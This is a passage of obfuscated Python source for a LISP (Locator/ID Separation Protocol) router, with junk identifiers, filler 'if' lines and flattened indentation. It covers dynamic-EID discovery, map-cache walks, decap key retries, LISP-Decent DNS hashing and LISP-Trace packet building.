if 8 - 8: i1IIi % I11i
ooO000OO = IIII [ "interface" ]
if ( ooO000OO == "" ) :
oooo = int ( IIII [ "instance-id" ] )
if ( oooo == - 1 ) : return
else :
oooo = lisp_get_interface_instance_id ( ooO000OO , None )
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
OoiIii11i11i = None
if ( "source-eid" in IIII ) :
iiO0OoO0OOO00 = IIII [ "source-eid" ]
OoiIii11i11i = lisp_address ( LISP_AFI_NONE , iiO0OoO0OOO00 , 0 , oooo )
if ( OoiIii11i11i . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( iiO0OoO0OOO00 ) )
return
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
oOOOOOo0o = None
if ( "dest-eid" in IIII ) :
O00OooOOO = IIII [ "dest-eid" ]
oOOOOOo0o = lisp_address ( LISP_AFI_NONE , O00OooOOO , 0 , oooo )
if ( oOOOOOo0o . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( O00OooOOO ) )
return
if 94 - 94: i11iIiiIii
if 76 - 76: II111iiii / ooOoO0o % i11iIiiIii * OoooooooOO * I1ii11iIi11i
if 94 - 94: OoOoOO00 * o0oOOo0O0Ooo / oO0o + O0 . I1Ii111 + o0oOOo0O0Ooo
if 22 - 22: IiII / ooOoO0o * i1IIi
if 26 - 26: O0 - oO0o
if 30 - 30: OoO0O00 / ooOoO0o . I1IiiI
if 70 - 70: I1ii11iIi11i
if 35 - 35: i1IIi - OoooooooOO * Ii1I / OOooOOo % I11i
if ( OoiIii11i11i ) :
oO0ooOOO = green ( OoiIii11i11i . print_address ( ) , False )
OoO0oO = lisp_db_for_lookups . lookup_cache ( OoiIii11i11i , False )
if ( OoO0oO != None ) :
if 72 - 72: I1Ii111 / OoO0O00 + II111iiii
if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
if 25 - 25: IiII * IiII
if 54 - 54: I1Ii111
if 90 - 90: Oo0Ooo / Ii1I
if ( OoO0oO . dynamic_eid_configured ( ) ) :
i111IIiIiiI1 = lisp_allow_dynamic_eid ( ooO000OO , OoiIii11i11i )
if ( i111IIiIiiI1 != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( OoO0oO , OoiIii11i11i , ooO000OO , i111IIiIiiI1 )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( oO0ooOOO , ooO000OO ) )
if 66 - 66: i11iIiiIii - I11i + oO0o . OoooooooOO
if 77 - 77: OoO0O00 / OOooOOo
if 97 - 97: OoOoOO00 / Ii1I * I1IiiI - Oo0Ooo % O0
else :
lprint ( "Punt from non-EID source {}" . format ( oO0ooOOO ) )
if 66 - 66: O0 + I1IiiI % iIii1I11I1II1 . i1IIi % II111iiii - i1IIi
if 93 - 93: O0 + OoooooooOO % IiII % oO0o % I1ii11iIi11i
if 36 - 36: I1IiiI - oO0o * Oo0Ooo + oO0o % iII111i - i11iIiiIii
if 93 - 93: O0
if 11 - 11: OoooooooOO . I1ii11iIi11i + I1ii11iIi11i
if 73 - 73: OoooooooOO
if ( oOOOOOo0o ) :
I11iiI1III = lisp_map_cache_lookup ( OoiIii11i11i , oOOOOOo0o )
if ( I11iiI1III == None or lisp_mr_or_pubsub ( I11iiI1III . action ) ) :
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
if 100 - 100: II111iiii + oO0o
if 85 - 85: I1ii11iIi11i % I1ii11iIi11i . Ii1I
if 42 - 42: oO0o + OoO0O00
if 16 - 16: Ii1I
if ( lisp_rate_limit_map_request ( oOOOOOo0o ) ) : return
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
iIiI1IIi1Ii1i = ( I11iiI1III and I11iiI1III . action == LISP_SEND_PUBSUB_ACTION )
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
OoiIii11i11i , oOOOOOo0o , None , iIiI1IIi1Ii1i )
else :
oO0ooOOO = green ( oOOOOOo0o . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( oO0ooOOO ) )
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
return
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if 24 - 24: IiII / Oo0Ooo
if 90 - 90: ooOoO0o . OOooOOo - Ii1I
if 60 - 60: i11iIiiIii % iII111i . I1IiiI * I1ii11iIi11i
if 30 - 30: Ii1I + i11iIiiIii . I11i + o0oOOo0O0Ooo - OoO0O00
def lisp_ipc_map_cache_entry ( mc , jdata ) :
oo0O00OOOOO = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( oo0O00OOOOO )
return ( [ True , jdata ] )
if 55 - 55: ooOoO0o - II111iiii . ooOoO0o . iII111i / OoooooooOO
if 51 - 51: I1IiiI * I1Ii111 - ooOoO0o + IiII
if 22 - 22: OoOoOO00 % Ii1I + iII111i
if 64 - 64: ooOoO0o
if 87 - 87: IiII - Ii1I / Oo0Ooo / I1ii11iIi11i . iII111i
if 49 - 49: IiII * OoooooooOO * iIii1I11I1II1 * Oo0Ooo / iII111i % oO0o
if 88 - 88: I1Ii111 * OOooOOo
if 38 - 38: Oo0Ooo - OoooooooOO - OoooooooOO / II111iiii
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 10 - 10: II111iiii - OoO0O00 / II111iiii % Ii1I - OoOoOO00
if 90 - 90: I11i + II111iiii - oO0o - ooOoO0o / ooOoO0o / i11iIiiIii
if 80 - 80: I1ii11iIi11i % O0 / II111iiii + iII111i
if 22 - 22: Oo0Ooo + ooOoO0o . OOooOOo % Oo0Ooo . IiII
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 34 - 34: Ii1I . OoOoOO00 - OOooOOo * Oo0Ooo - ooOoO0o . oO0o
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 42 - 42: O0 + OoO0O00
if 47 - 47: O0 % OoOoOO00 + Ii1I * iIii1I11I1II1
if 55 - 55: Ii1I
if 93 - 93: iII111i + OOooOOo . OoooooooOO . I1Ii111 . O0
if 46 - 46: i11iIiiIii
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 26 - 26: I11i * Oo0Ooo % OoO0O00 + Oo0Ooo - I1ii11iIi11i
if 74 - 74: i1IIi + OoO0O00 . II111iiii + I1Ii111
if 59 - 59: Ii1I . i11iIiiIii . o0oOOo0O0Ooo * iIii1I11I1II1 . OoOoOO00 . II111iiii
if 67 - 67: OoO0O00 - Oo0Ooo + OOooOOo / OoOoOO00 + OOooOOo
if 18 - 18: Oo0Ooo % OoOoOO00 % i1IIi
if 66 - 66: OoOoOO00 % II111iiii
if 16 - 16: i11iIiiIii - I1IiiI + ooOoO0o * oO0o
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
i1iiii = eid . print_address ( )
if ( i1iiii in db . dynamic_eids ) :
db . dynamic_eids [ i1iiii ] . last_packet = lisp_get_timestamp ( )
return
if 30 - 30: II111iiii / o0oOOo0O0Ooo
if 57 - 57: I11i / I1ii11iIi11i . I11i
if 68 - 68: OoOoOO00 + O0 . I1IiiI
if 26 - 26: I1ii11iIi11i
if 98 - 98: Oo0Ooo
IIIII1IIiIi = lisp_dynamic_eid ( )
IIIII1IIiIi . dynamic_eid . copy_address ( eid )
IIIII1IIiIi . interface = routed_interface
IIIII1IIiIi . last_packet = lisp_get_timestamp ( )
IIIII1IIiIi . get_timeout ( routed_interface )
db . dynamic_eids [ i1iiii ] = IIIII1IIiIi
if 72 - 72: oO0o + OoooooooOO . O0 + IiII
IiIiIii1I = ""
if ( input_interface != routed_interface ) :
IiIiIii1I = ", routed-interface " + routed_interface
if 34 - 34: I1ii11iIi11i * i11iIiiIii
if 6 - 6: I1ii11iIi11i + I1IiiI / OoooooooOO % I11i * Oo0Ooo
i1i111 = green ( i1iiii , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( i1i111 , input_interface , IiIiIii1I , IIIII1IIiIi . timeout ) )
if 54 - 54: IiII % iIii1I11I1II1 . OoO0O00
if 47 - 47: OoooooooOO / ooOoO0o / I1Ii111
if 58 - 58: IiII * IiII / I11i . iIii1I11I1II1
if 73 - 73: OoooooooOO + OoooooooOO + o0oOOo0O0Ooo / IiII . ooOoO0o
if 72 - 72: ooOoO0o . I1ii11iIi11i . Oo0Ooo - IiII
OO = "learn%{}%{}" . format ( i1iiii , routed_interface )
OO = lisp_command_ipc ( OO , "lisp-itr" )
lisp_ipc ( OO , lisp_ipc_listen_socket , "lisp-etr" )
return
if 35 - 35: IiII
if 36 - 36: I1Ii111 . o0oOOo0O0Ooo / IiII + OOooOOo
if 11 - 11: II111iiii / i11iIiiIii + i1IIi . OoooooooOO * I1IiiI . II111iiii
if 21 - 21: Ii1I . O0 . IiII + I11i
if 86 - 86: OoOoOO00
if 36 - 36: ooOoO0o * OoOoOO00 * OoooooooOO
if 22 - 22: OoOoOO00 + I1ii11iIi11i * iIii1I11I1II1 + iIii1I11I1II1
if 100 - 100: iII111i - ooOoO0o + I11i - oO0o * i1IIi
if 62 - 62: OoO0O00 / OoOoOO00 * OoOoOO00
if 83 - 83: oO0o * o0oOOo0O0Ooo
if 25 - 25: o0oOOo0O0Ooo % Oo0Ooo . Oo0Ooo + OoO0O00
if 23 - 23: I11i + I1ii11iIi11i * iIii1I11I1II1 - i1IIi
if 33 - 33: I1IiiI + o0oOOo0O0Ooo . OoOoOO00
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 35 - 35: iII111i / Ii1I
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if ( addr_str . find ( ":" ) != - 1 ) : return
if 34 - 34: I1IiiI . Oo0Ooo
O0oOoO00O = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
for III in lisp_crypto_keys_by_rloc_decap :
if 32 - 32: iIii1I11I1II1 - I11i
if 49 - 49: I11i * I1Ii111 - iIii1I11I1II1 * O0
if 72 - 72: I1IiiI * iII111i
if 61 - 61: Ii1I * Oo0Ooo * I1Ii111 % I11i + iII111i % oO0o
if ( III . find ( addr_str ) == - 1 ) : continue
if 67 - 67: IiII
if 90 - 90: o0oOOo0O0Ooo
if 5 - 5: i1IIi
if 55 - 55: Ii1I
if ( III == addr_str ) : continue
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
if 29 - 29: o0oOOo0O0Ooo / O0 / OoO0O00
if 23 - 23: Ii1I + i11iIiiIii % IiII
oo0O00OOOOO = lisp_crypto_keys_by_rloc_decap [ III ]
if ( oo0O00OOOOO == O0oOoO00O ) : continue
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
ii1iI1iI11 = oo0O00OOOOO [ 1 ]
if ( packet_icv != ii1iI1iI11 . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( III , False ) ) )
continue
if 61 - 61: oO0o . I1Ii111
if 74 - 74: O0 . Ii1I - iII111i % IiII + II111iiii
lprint ( "Changing decap crypto key to {}" . format ( red ( III , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = oo0O00OOOOO
if 71 - 71: oO0o + Ii1I % oO0o
return
if 17 - 17: I1Ii111 % I1Ii111 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 + iII111i . i1IIi / O0 / I1Ii111 + o0oOOo0O0Ooo
if 70 - 70: O0 % ooOoO0o - iII111i + oO0o
if 12 - 12: I1Ii111 - OoO0O00 % II111iiii % ooOoO0o / II111iiii % OoOoOO00
if 74 - 74: iII111i . OOooOOo * Ii1I / Oo0Ooo . OoO0O00 . I11i
if 65 - 65: i11iIiiIii - OoO0O00 / OoooooooOO * I1IiiI % iII111i
if 15 - 15: OOooOOo * Ii1I / ooOoO0o
if 70 - 70: i11iIiiIii * oO0o . I11i - OoooooooOO / I1ii11iIi11i
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 10 - 10: IiII * OoOoOO00 . II111iiii . II111iiii * Oo0Ooo
if 23 - 23: I1ii11iIi11i + I11i
if 74 - 74: i1IIi % I1IiiI
if 44 - 44: Oo0Ooo - OoooooooOO % ooOoO0o + II111iiii
if 60 - 60: o0oOOo0O0Ooo - ooOoO0o + i11iIiiIii % I1ii11iIi11i % II111iiii
if 62 - 62: Ii1I
if 30 - 30: iII111i % O0 + II111iiii * I1IiiI
if 91 - 91: i11iIiiIii
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
ooO0o = dns_name . split ( "." )
ooO0o = "." . join ( ooO0o [ 1 : : ] )
return ( ooO0o == lisp_decent_dns_suffix )
if 35 - 35: OoOoOO00 * I1Ii111 / Oo0Ooo - i1IIi - IiII + OOooOOo
if 96 - 96: Oo0Ooo + I1ii11iIi11i . O0
if 62 - 62: i1IIi % OoooooooOO % OoooooooOO
if 53 - 53: O0 * oO0o
if 22 - 22: OOooOOo % Oo0Ooo % ooOoO0o - O0 + i1IIi
if 67 - 67: OoO0O00 / I1IiiI - IiII + iII111i - iII111i
if 4 - 4: IiII . Ii1I . IiII % OoO0O00
if 12 - 12: OoOoOO00 + O0 / O0 . i1IIi
if 58 - 58: IiII . iII111i % O0 . Ii1I * Oo0Ooo
if 54 - 54: OoO0O00 % OOooOOo - OoO0O00 . Oo0Ooo % i1IIi
if 95 - 95: iII111i . OoooooooOO . o0oOOo0O0Ooo / II111iiii - OoooooooOO / I1Ii111
def lisp_get_decent_index ( eid ) :
i1iiii = eid . print_prefix ( )
Iii1 = hmac . new ( b"lisp-decent" , i1iiii , hashlib . sha256 ) . hexdigest ( )
if 32 - 32: ooOoO0o / OOooOOo + Oo0Ooo + II111iiii
if 91 - 91: O0
if 64 - 64: I1Ii111 - II111iiii + oO0o % ooOoO0o * oO0o
if 27 - 27: iIii1I11I1II1 - Ii1I . i11iIiiIii / IiII . I1Ii111 / i11iIiiIii
iIiooOOo0OOoOO0O = os . getenv ( "LISP_DECENT_HASH_WIDTH" )
if ( iIiooOOo0OOoOO0O in [ "" , None ] ) :
iIiooOOo0OOoOO0O = 12
else :
iIiooOOo0OOoOO0O = int ( iIiooOOo0OOoOO0O )
if ( iIiooOOo0OOoOO0O > 32 ) :
iIiooOOo0OOoOO0O = 12
else :
iIiooOOo0OOoOO0O *= 2
if 74 - 74: OoO0O00 . iII111i / OoO0O00 + Oo0Ooo
if 21 - 21: I1IiiI . II111iiii % iIii1I11I1II1
if 81 - 81: Oo0Ooo + i11iIiiIii
oOoOO = Iii1 [ 0 : iIiooOOo0OOoOO0O ]
OOOooo0OooOoO = int ( oOoOO , 16 ) % lisp_decent_modulus
if 9 - 9: I1ii11iIi11i / OoOoOO00 * o0oOOo0O0Ooo * I11i * Oo0Ooo / o0oOOo0O0Ooo
lprint ( "LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}" . format ( lisp_decent_modulus , old_div ( iIiooOOo0OOoOO0O , 2 ) , oOoOO , OOOooo0OooOoO ) )
if 67 - 67: i1IIi % OoooooooOO - Oo0Ooo . I1IiiI + i1IIi . Ii1I
if 98 - 98: o0oOOo0O0Ooo - OoooooooOO - OoooooooOO + OoOoOO00 - Oo0Ooo % ooOoO0o
return ( OOOooo0OooOoO )
if 54 - 54: Ii1I * I1ii11iIi11i * OoooooooOO + II111iiii / ooOoO0o
if 11 - 11: OoooooooOO * ooOoO0o / II111iiii * oO0o / OoOoOO00 . iIii1I11I1II1
if 9 - 9: iII111i
if 13 - 13: IiII - Oo0Ooo
if 94 - 94: I11i - iIii1I11I1II1 + oO0o
if 72 - 72: i1IIi . OoO0O00
if 95 - 95: OoOoOO00 + Ii1I
def lisp_get_decent_dns_name ( eid ) :
OOOooo0OooOoO = lisp_get_decent_index ( eid )
return ( str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix )
if 48 - 48: Ii1I % IiII + OoO0O00 . IiII
if 42 - 42: Ii1I
if 70 - 70: I11i
if 82 - 82: O0
if 58 - 58: II111iiii . O0 - OoO0O00 - IiII
if 4 - 4: i11iIiiIii + i11iIiiIii / O0
if 46 - 46: I11i % ooOoO0o - Ii1I
if 25 - 25: O0 / i11iIiiIii . O0
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
OOOooo0OooOoO = lisp_get_decent_index ( o0Ooo0Oooo0o )
return ( str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix )
if 24 - 24: I1ii11iIi11i - i11iIiiIii / iII111i . Oo0Ooo / I1ii11iIi11i
if 92 - 92: I11i % OoooooooOO
if 14 - 14: i11iIiiIii * i11iIiiIii * OoOoOO00
if 84 - 84: OOooOOo % I1Ii111 + I11i / I1IiiI . iII111i
if 78 - 78: oO0o . Oo0Ooo
if 18 - 18: IiII
if 35 - 35: OoooooooOO / i1IIi - OoO0O00 + Oo0Ooo - o0oOOo0O0Ooo
if 100 - 100: II111iiii % i11iIiiIii % oO0o + O0
if 46 - 46: OoO0O00 / I1IiiI - Oo0Ooo . o0oOOo0O0Ooo . Oo0Ooo % I11i
if 43 - 43: IiII - O0 + I1Ii111 % OoooooooOO % OoO0O00 / I1Ii111
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 48 - 48: I1ii11iIi11i . i1IIi % i1IIi - iII111i * o0oOOo0O0Ooo + IiII
oo00 = 28 if packet . inner_version == 4 else 48
IiiIi1I = packet . packet [ oo00 : : ]
o0oo0oOoo0 = lisp_trace ( )
if ( o0oo0oOoo0 . decode ( IiiIi1I ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 42 - 42: OoooooooOO / ooOoO0o % II111iiii - ooOoO0o
if 15 - 15: II111iiii + I1IiiI
IIIiii = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 53 - 53: Ii1I . iIii1I11I1II1
if 49 - 49: I11i % OoO0O00 * I1IiiI + I1IiiI . iII111i . II111iiii
if 60 - 60: OoOoOO00
if 71 - 71: O0 * OOooOOo . I1IiiI . I1Ii111 * I11i
if 45 - 45: O0 . O0 . II111iiii * ooOoO0o
if 2 - 2: OoO0O00 . o0oOOo0O0Ooo
if ( IIIiii != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : IIIiii += ":{}" . format ( packet . encap_port )
if 48 - 48: Ii1I
if 45 - 45: I1ii11iIi11i - I11i + Ii1I
if 82 - 82: iII111i
if 81 - 81: i1IIi % OOooOOo - OoO0O00 - Oo0Ooo
if 19 - 19: i1IIi
oo0O00OOOOO = { }
oo0O00OOOOO [ "n" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 97 - 97: OoO0O00 + i11iIiiIii % I1IiiI * Ii1I
O0OooOoOoo0 = packet . outer_source
if ( O0OooOoOoo0 . is_null ( ) ) : O0OooOoOoo0 = lisp_myrlocs [ 0 ]
oo0O00OOOOO [ "sr" ] = O0OooOoOoo0 . print_address_no_iid ( )
if 11 - 11: ooOoO0o - I1Ii111 - I11i + OoOoOO00
if 20 - 20: I11i + O0
if 27 - 27: Oo0Ooo
if 12 - 12: I1ii11iIi11i . iII111i - iII111i - OOooOOo - iIii1I11I1II1
if 50 - 50: I1IiiI - iIii1I11I1II1 . iII111i - Ii1I / I1Ii111 + iII111i
if ( oo0O00OOOOO [ "n" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
oo0O00OOOOO [ "sr" ] += ":{}" . format ( packet . inner_sport )
if 46 - 46: OOooOOo + iII111i % Oo0Ooo * iII111i % OoooooooOO * IiII
if 27 - 27: I1IiiI + I1IiiI + I1ii11iIi11i - oO0o * OOooOOo
oo0O00OOOOO [ "hn" ] = lisp_hostname
III = ed [ 0 ] + "ts"
oo0O00OOOOO [ III ] = lisp_get_timestamp ( )
if 53 - 53: I1ii11iIi11i / OoooooooOO * iIii1I11I1II1
if 4 - 4: I1IiiI . iIii1I11I1II1 + OOooOOo / IiII . o0oOOo0O0Ooo . I11i
if 52 - 52: ooOoO0o % i11iIiiIii . IiII + OoO0O00
if 66 - 66: II111iiii . Ii1I
if 42 - 42: iIii1I11I1II1 * iII111i * I1IiiI
if 66 - 66: Oo0Ooo * i1IIi / I1ii11iIi11i / OoO0O00
if ( IIIiii == "?" and oo0O00OOOOO [ "n" ] == "ETR" ) :
OoO0oO = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( OoO0oO != None and len ( OoO0oO . rloc_set ) >= 1 ) :
IIIiii = OoO0oO . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 12 - 12: OOooOOo + iIii1I11I1II1 % I1Ii111 + OOooOOo
if 19 - 19: OoO0O00 / I1IiiI - o0oOOo0O0Ooo - i1IIi + I1ii11iIi11i * OoooooooOO
oo0O00OOOOO [ "dr" ] = IIIiii
if 74 - 74: I1Ii111 . I11i / Oo0Ooo
if 88 - 88: oO0o % OoO0O00 - i11iIiiIii % I1Ii111 / O0 * IiII
if 99 - 99: o0oOOo0O0Ooo . ooOoO0o / i11iIiiIii
if 44 - 44: IiII + OOooOOo % OoO0O00 . OoooooooOO * O0
if ( IIIiii == "?" and reason != None ) :
oo0O00OOOOO [ "dr" ] += " ({})" . format ( reason )
if 72 - 72: i1IIi - iII111i * I1IiiI % O0 - I11i * O0
if 78 - 78: I1IiiI - OoO0O00 / Ii1I . i1IIi
if 30 - 30: IiII
if 21 - 21: i1IIi . iII111i - I1IiiI
if 28 - 28: IiII / Ii1I - i1IIi - OoOoOO00
if ( rloc_entry != None ) :
oo0O00OOOOO [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
oo0O00OOOOO [ "hops" ] = rloc_entry . recent_rloc_probe_hops
oo0O00OOOOO [ "lats" ] = rloc_entry . recent_rloc_probe_latencies
if 65 - 65: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo
if 77 - 77: OoooooooOO - Oo0Ooo - OoOoOO00 / I11i / O0 . i11iIiiIii
if 27 - 27: I1Ii111 * O0
if 9 - 9: i1IIi - Oo0Ooo - i11iIiiIii / iIii1I11I1II1 . i1IIi
if 2 - 2: I11i + II111iiii - I11i / oO0o / I11i
if 73 - 73: IiII % I1Ii111 . OoOoOO00
OoiIii11i11i = packet . inner_source . print_address ( )
oOOOOOo0o = packet . inner_dest . print_address ( )
if ( o0oo0oOoo0 . packet_json == [ ] ) :
o0OO0ooooO = { }
o0OO0ooooO [ "se" ] = OoiIii11i11i
o0OO0ooooO [ "de" ] = oOOOOOo0o
o0OO0ooooO [ "paths" ] = [ ]
o0oo0oOoo0 . packet_json . append ( o0OO0ooooO )
if 96 - 96: I1IiiI / ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I . I11i
if 87 - 87: Oo0Ooo / IiII * OOooOOo + I1ii11iIi11i . I11i
if 56 - 56: oO0o + oO0o % o0oOOo0O0Ooo + OOooOOo . II111iiii + i11iIiiIii
if 45 - 45: iIii1I11I1II1 / o0oOOo0O0Ooo * OoooooooOO - Oo0Ooo
if 77 - 77: II111iiii
for o0OO0ooooO in o0oo0oOoo0 . packet_json :
if ( o0OO0ooooO [ "de" ] != oOOOOOo0o ) : continue
o0OO0ooooO [ "paths" ] . append ( oo0O00OOOOO )
break
if 8 - 8: I1IiiI * II111iiii % I1ii11iIi11i
if 88 - 88: Oo0Ooo . oO0o + OoOoOO00 % OoooooooOO
if 81 - 81: OoooooooOO . I1Ii111 + OoO0O00 % I1Ii111
if 49 - 49: oO0o . oO0o % oO0o / Oo0Ooo
if 62 - 62: ooOoO0o . i1IIi % OoO0O00 - I1ii11iIi11i - IiII
if 57 - 57: i1IIi - II111iiii - O0 . iII111i + OoO0O00
if 67 - 67: OOooOOo * iII111i / iIii1I11I1II1 / I1ii11iIi11i
if 10 - 10: OoooooooOO % I1ii11iIi11i * i1IIi . iII111i
ooOoO000oO = False
if ( len ( o0oo0oOoo0 . packet_json ) == 1 and oo0O00OOOOO [ "n" ] == "ETR" and
o0oo0oOoo0 . myeid ( packet . inner_dest ) ) :
o0OO0ooooO = { }
o0OO0ooooO [ "se" ] = oOOOOOo0o
o0OO0ooooO [ "de" ] = OoiIii11i11i
o0OO0ooooO [ "paths" ] = [ ]
o0oo0oOoo0 . packet_json . append ( o0OO0ooooO )
ooOoO000oO = True
if 13 - 13: i1IIi * Oo0Ooo % i11iIiiIii % I11i / II111iiii - Ii1I
if 71 - 71: OoOoOO00 % ooOoO0o
if 36 - 36: Ii1I * oO0o / oO0o % I1IiiI % I1IiiI + I1IiiI
if 41 - 41: OoooooooOO . O0 % OOooOOo
if 88 - 88: O0
if 44 - 44: II111iiii - IiII / I1IiiI + ooOoO0o % iII111i - iII111i
o0oo0oOoo0 . print_trace ( )
IiiIi1I = o0oo0oOoo0 . encode ( )
if 53 - 53: OoooooooOO
if 41 - 41: i1IIi - oO0o
if 41 - 41: I11i
if 92 - 92: i11iIiiIii
if 62 - 62: i1IIi / I1IiiI - o0oOOo0O0Ooo
if 3 - 3: O0 * OoOoOO00 * I11i / OoOoOO00
if 77 - 77: i1IIi
if 3 - 3: iII111i * OoO0O00 - oO0o + iII111i . o0oOOo0O0Ooo + I1IiiI
ooO0oii = o0oo0oOoo0 . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "sr" ]
if ( IIIiii == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( ooO0oii ) )
o0oo0oOoo0 . return_to_sender ( lisp_socket , ooO0oii , IiiIi1I )
return ( False )
if 35 - 35: OoOoOO00
if 61 - 61: I1Ii111
if 78 - 78: I1Ii111 * Ii1I % Ii1I + I1IiiI
if 83 - 83: iIii1I11I1II1 + O0 / IiII . iIii1I11I1II1
if 74 - 74: Oo0Ooo
if 60 - 60: OoooooooOO
Ooo000O00 = o0oo0oOoo0 . packet_length ( )
if 16 - 16: iIii1I11I1II1 - OoOoOO00 / I1ii11iIi11i % O0 % o0oOOo0O0Ooo
if 99 - 99: ooOoO0o . o0oOOo0O0Ooo - O0 * I1Ii111 . i11iIiiIii / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 + oO0o / iIii1I11I1II1 - i1IIi % OoO0O00
if 22 - 22: OOooOOo
if 65 - 65: i1IIi - oO0o . I1Ii111 . ooOoO0o % I1ii11iIi11i % I1ii11iIi11i
if 1 - 1: I1Ii111 + I1Ii111
O0OOOO = packet . packet [ 0 : oo00 ]
iIIiiIi = struct . pack ( "HH" , socket . htons ( Ooo000O00 ) , 0 )
O0OOOO = O0OOOO [ 0 : oo00 - 4 ] + iIIiiIi
if ( packet . inner_version == 6 and oo0O00OOOOO [ "n" ] == "ETR" and
len ( o0oo0oOoo0 . packet_json ) == 2 ) :
O0I1II1 = O0OOOO [ oo00 - 8 : : ] + IiiIi1I
O0I1II1 = lisp_udp_checksum ( OoiIii11i11i , oOOOOOo0o , O0I1II1 )
O0OOOO = O0OOOO [ 0 : oo00 - 8 ] + O0I1II1 [ 0 : 8 ]
if 77 - 77: OoooooooOO
if 10 - 10: I11i
if 22 - 22: Oo0Ooo . O0 / i1IIi - OoOoOO00
if 41 - 41: II111iiii - I1ii11iIi11i - I1Ii111
if 82 - 82: I1IiiI * I1IiiI / iIii1I11I1II1
if 14 - 14: I11i + Ii1I - OOooOOo % Ii1I / Ii1I
if 86 - 86: I1Ii111 - i11iIiiIii + Ii1I + I11i
if 96 - 96: Ii1I
if 28 - 28: i1IIi . oO0o . IiII + Oo0Ooo . Oo0Ooo . i1IIi
if ( ooOoO000oO ) :
if ( packet . inner_version == 4 ) :
O0OOOO = O0OOOO [ 0 : 12 ] + O0OOOO [ 16 : 20 ] + O0OOOO [ 12 : 16 ] + O0OOOO [ 22 : 24 ] + O0OOOO [ 20 : 22 ] + O0OOOO [ 24 : : ]
if 34 - 34: Oo0Ooo + IiII / i1IIi
else :
O0OOOO = O0OOOO [ 0 : 8 ] + O0OOOO [ 24 : 40 ] + O0OOOO [ 8 : 24 ] + O0OOOO [ 42 : 44 ] + O0OOOO [ 40 : 42 ] + O0OOOO [ 44 : : ]
if 33 - 33: i1IIi
if 26 - 26: ooOoO0o - Oo0Ooo * II111iiii - Oo0Ooo
IiI11I111 = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = IiI11I111
if 15 - 15: OoO0O00 - oO0o . OoOoOO00 / O0 * oO0o
if 45 - 45: O0
